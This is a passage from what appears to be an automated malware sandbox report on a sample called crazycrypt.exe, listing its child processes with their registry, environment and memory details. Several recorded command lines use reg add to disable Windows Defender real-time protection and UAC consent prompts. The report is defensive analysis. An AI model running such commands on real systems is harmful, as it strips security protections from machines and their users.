| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\reg.exe | os_pid = 0xab4, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\system32\cmd.exe | base_address = 0x4ab10000 |
|
1 | |
| Get Handle | c:\windows\system32\kernel32.dll | base_address = 0x77740000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\system32\cmd.exe, file_name_orig = C:\Windows\system32\cmd.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetThreadUILanguage, address_out = 0x77756d40 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CopyFileExW, address_out = 0x777523d0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = IsDebuggerPresent, address_out = 0x77748290 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x777517e0 |
|
1 |
System (2)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 1627-02-19 14:11:54 (UTC) |
|
1 | |
| Get Time | type = Ticks, time = 114052 |
|
1 |
Environment (19)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
7 | |
| Get Environment String | name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
2 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
2 | |
| Get Environment String | name = PROMPT |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Set Environment String | name = PROMPT, value = $P$G |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop |
|
1 | |
| Set Environment String | name = COPYCMD |
|
1 | |
| Set Environment String | name = =ExitCode, value = 00000001 |
|
1 | |
| Set Environment String | name = =ExitCodeAscii |
|
1 |
Process #9: cmd.exe
59
0
| Information | Value |
|---|---|
| ID | #9 |
| File Name | c:\windows\system32\cmd.exe |
| Command Line | cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection /v DisableOnAccessProtection /t REG_DWORD /d 00000001 /f |
| Initial Working Directory | C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\ |
| Monitor | Start Time: 00:01:19, Reason: Child Process |
| Unmonitor | End Time: 00:01:22, Reason: Self Terminated |
| Monitor Duration | 00:00:03 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xa0c |
| Parent PID | 0x98c (c:\users\5p5nrgjn0js halpmcxz\desktop\crazycrypt.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | XDUWTFONO\5p5NrGJn0jS HALPmcxz |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
A10
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000020000 | 0x00020000 | 0x0002ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00040fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000050000 | 0x00050000 | 0x00056fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000060000 | 0x00060000 | 0x00061fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000070000 | 0x00070000 | 0x00070fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000080000 | 0x00080000 | 0x00080fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000090000 | 0x00090000 | 0x0018ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000001b0000 | 0x001b0000 | 0x002affff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x002b0000 | 0x00316fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000410000 | 0x00410000 | 0x0041ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000420000 | 0x00420000 | 0x0051ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000520000 | 0x00520000 | 0x006a7fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000006b0000 | 0x006b0000 | 0x00830fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000840000 | 0x00840000 | 0x01c3ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000001c40000 | 0x01c40000 | 0x01f82fff | Pagefile Backed Memory | r |
|
|
|
- |
| sortdefault.nls | 0x01f90000 | 0x0225efff | Memory Mapped File | r |
|
|
|
- |
| cmd.exe | 0x4ab10000 | 0x4ab68fff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x77640000 | 0x77739fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x77740000 | 0x7785efff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77860000 | 0x77a08fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| winbrand.dll | 0x7fef8dc0000 | 0x7fef8dc7fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x7fefd900000 | 0x7fefd96afff | Memory Mapped File | rwx |
|
|
|
- |
| usp10.dll | 0x7fefdb80000 | 0x7fefdc48fff | Memory Mapped File | rwx |
|
|
|
- |
| lpk.dll | 0x7fefdd30000 | 0x7fefdd3dfff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x7fefdd40000 | 0x7fefdd6dfff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x7fefed10000 | 0x7fefed76fff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x7fefed80000 | 0x7fefee88fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x7feffa80000 | 0x7feffb1efff | Memory Mapped File | rwx |
|
|
|
- |
| apisetschema.dll | 0x7feffb80000 | 0x7feffb80fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000007fffffb0000 | 0x7fffffb0000 | 0x7fffffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000007fffffd5000 | 0x7fffffd5000 | 0x7fffffd5fff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffde000 | 0x7fffffde000 | 0x7fffffdffff | Private Memory | rw |
|
|
|
- |
Host Behavior
File (10)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | C:\Users\5p5NrGJn0jS HALPmcxz\Desktop | type = file_attributes |
|
2 | |
| Open | STD_OUTPUT_HANDLE | - |
|
5 | |
| Open | STD_INPUT_HANDLE | - |
|
3 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 24, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\reg.exe | os_pid = 0xad4, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\system32\cmd.exe | base_address = 0x4ab10000 |
|
1 | |
| Get Handle | c:\windows\system32\kernel32.dll | base_address = 0x77740000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\system32\cmd.exe, file_name_orig = C:\Windows\system32\cmd.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetThreadUILanguage, address_out = 0x77756d40 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CopyFileExW, address_out = 0x777523d0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = IsDebuggerPresent, address_out = 0x77748290 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x777517e0 |
|
1 |
System (2)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 1627-02-19 14:11:54 (UTC) |
|
1 | |
| Get Time | type = Ticks, time = 114130 |
|
1 |
Environment (19)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
7 | |
| Get Environment String | name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
2 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
2 | |
| Get Environment String | name = PROMPT |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Set Environment String | name = PROMPT, value = $P$G |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop |
|
1 | |
| Set Environment String | name = COPYCMD |
|
1 | |
| Set Environment String | name = =ExitCode, value = 00000001 |
|
1 | |
| Set Environment String | name = =ExitCodeAscii |
|
1 |
Process #10: cmd.exe
59
0
| Information | Value |
|---|---|
| ID | #10 |
| File Name | c:\windows\system32\cmd.exe |
| Command Line | cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection /v DisableScanOnRealtimeEnable /t REG_DWORD /d 00000001 /f |
| Initial Working Directory | C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\ |
| Monitor | Start Time: 00:01:19, Reason: Child Process |
| Unmonitor | End Time: 00:01:22, Reason: Self Terminated |
| Monitor Duration | 00:00:03 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xa14 |
| Parent PID | 0x98c (c:\users\5p5nrgjn0js halpmcxz\desktop\crazycrypt.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | XDUWTFONO\5p5NrGJn0jS HALPmcxz |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
A18
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000020000 | 0x00020000 | 0x0002ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00040fff | Pagefile Backed Memory | r |
|
|
|
- |
| locale.nls | 0x00050000 | 0x000b6fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00000000000c0000 | 0x000c0000 | 0x000c6fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000000d0000 | 0x000d0000 | 0x001cffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000001d0000 | 0x001d0000 | 0x001d1fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000000001e0000 | 0x001e0000 | 0x001e0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000001f0000 | 0x001f0000 | 0x001f0fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000270000 | 0x00270000 | 0x0027ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000002e0000 | 0x002e0000 | 0x003dffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000003e0000 | 0x003e0000 | 0x004dffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000004e0000 | 0x004e0000 | 0x00667fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000670000 | 0x00670000 | 0x007f0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000800000 | 0x00800000 | 0x01bfffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000001c00000 | 0x01c00000 | 0x01f42fff | Pagefile Backed Memory | r |
|
|
|
- |
| sortdefault.nls | 0x01f50000 | 0x0221efff | Memory Mapped File | r |
|
|
|
- |
| cmd.exe | 0x4ab10000 | 0x4ab68fff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x77640000 | 0x77739fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x77740000 | 0x7785efff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77860000 | 0x77a08fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| winbrand.dll | 0x7fef8dc0000 | 0x7fef8dc7fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x7fefd900000 | 0x7fefd96afff | Memory Mapped File | rwx |
|
|
|
- |
| usp10.dll | 0x7fefdb80000 | 0x7fefdc48fff | Memory Mapped File | rwx |
|
|
|
- |
| lpk.dll | 0x7fefdd30000 | 0x7fefdd3dfff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x7fefdd40000 | 0x7fefdd6dfff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x7fefed10000 | 0x7fefed76fff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x7fefed80000 | 0x7fefee88fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x7feffa80000 | 0x7feffb1efff | Memory Mapped File | rwx |
|
|
|
- |
| apisetschema.dll | 0x7feffb80000 | 0x7feffb80fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000007fffffb0000 | 0x7fffffb0000 | 0x7fffffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000007fffffd5000 | 0x7fffffd5000 | 0x7fffffd5fff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffde000 | 0x7fffffde000 | 0x7fffffdffff | Private Memory | rw |
|
|
|
- |
Host Behavior
File (10)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | C:\Users\5p5NrGJn0jS HALPmcxz\Desktop | type = file_attributes |
|
2 | |
| Open | STD_OUTPUT_HANDLE | - |
|
5 | |
| Open | STD_INPUT_HANDLE | - |
|
3 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 24, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\reg.exe | os_pid = 0xaac, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\system32\cmd.exe | base_address = 0x4ab10000 |
|
1 | |
| Get Handle | c:\windows\system32\kernel32.dll | base_address = 0x77740000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\system32\cmd.exe, file_name_orig = C:\Windows\system32\cmd.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetThreadUILanguage, address_out = 0x77756d40 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CopyFileExW, address_out = 0x777523d0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = IsDebuggerPresent, address_out = 0x77748290 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x777517e0 |
|
1 |
System (2)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 1627-02-19 14:11:54 (UTC) |
|
1 | |
| Get Time | type = Ticks, time = 114099 |
|
1 |
Environment (19)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
7 | |
| Get Environment String | name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
2 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
2 | |
| Get Environment String | name = PROMPT |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Set Environment String | name = PROMPT, value = $P$G |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop |
|
1 | |
| Set Environment String | name = COPYCMD |
|
1 | |
| Set Environment String | name = =ExitCode, value = 00000001 |
|
1 | |
| Set Environment String | name = =ExitCodeAscii |
|
1 |
Process #11: reg.exe
9
0
| Information | Value |
|---|---|
| ID | #11 |
| File Name | c:\windows\system32\reg.exe |
| Command Line | reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Systemm / v ConsentPromptBehaviorUser /t REG_DWORD /d 0 /f |
| Initial Working Directory | C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\ |
| Monitor | Start Time: 00:01:20, Reason: Child Process |
| Unmonitor | End Time: 00:01:22, Reason: Self Terminated |
| Monitor Duration | 00:00:02 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xa9c |
| Parent PID | 0x9cc (c:\windows\system32\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | XDUWTFONO\5p5NrGJn0jS HALPmcxz |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
AA0
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000020000 | 0x00020000 | 0x0002ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00040fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000050000 | 0x00050000 | 0x0005ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000060000 | 0x00060000 | 0x00066fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000070000 | 0x00070000 | 0x000effff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x000f0000 | 0x00156fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000160000 | 0x00160000 | 0x0025ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000260000 | 0x00260000 | 0x00261fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000270000 | 0x00270000 | 0x0036ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000370000 | 0x00370000 | 0x004f7fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000500000 | 0x00500000 | 0x00680fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000690000 | 0x00690000 | 0x01a8ffff | Pagefile Backed Memory | r |
|
|
|
- |
| reg.exe.mui | 0x01a90000 | 0x01a98fff | Memory Mapped File | rw |
|
|
|
- |
| private_0x0000000001aa0000 | 0x01aa0000 | 0x01aa0fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001ab0000 | 0x01ab0000 | 0x01ab0fff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x01ac0000 | 0x01d8efff | Memory Mapped File | r |
|
|
|
- |
| user32.dll | 0x77640000 | 0x77739fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x77740000 | 0x7785efff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77860000 | 0x77a08fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| reg.exe | 0xfff70000 | 0xfffc5fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x7fefd900000 | 0x7fefd96afff | Memory Mapped File | rwx |
|
|
|
- |
| usp10.dll | 0x7fefdb80000 | 0x7fefdc48fff | Memory Mapped File | rwx |
|
|
|
- |
| lpk.dll | 0x7fefdd30000 | 0x7fefdd3dfff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x7fefdd40000 | 0x7fefdd6dfff | Memory Mapped File | rwx |
|
|
|
- |
| nsi.dll | 0x7fefdef0000 | 0x7fefdef7fff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x7fefed10000 | 0x7fefed76fff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x7fefed80000 | 0x7fefee88fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x7feff0f0000 | 0x7feff1cafff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x7feff1d0000 | 0x7feff2fcfff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x7feff4e0000 | 0x7feff550fff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x7feff850000 | 0x7feff86efff | Memory Mapped File | rwx |
|
|
|
- |
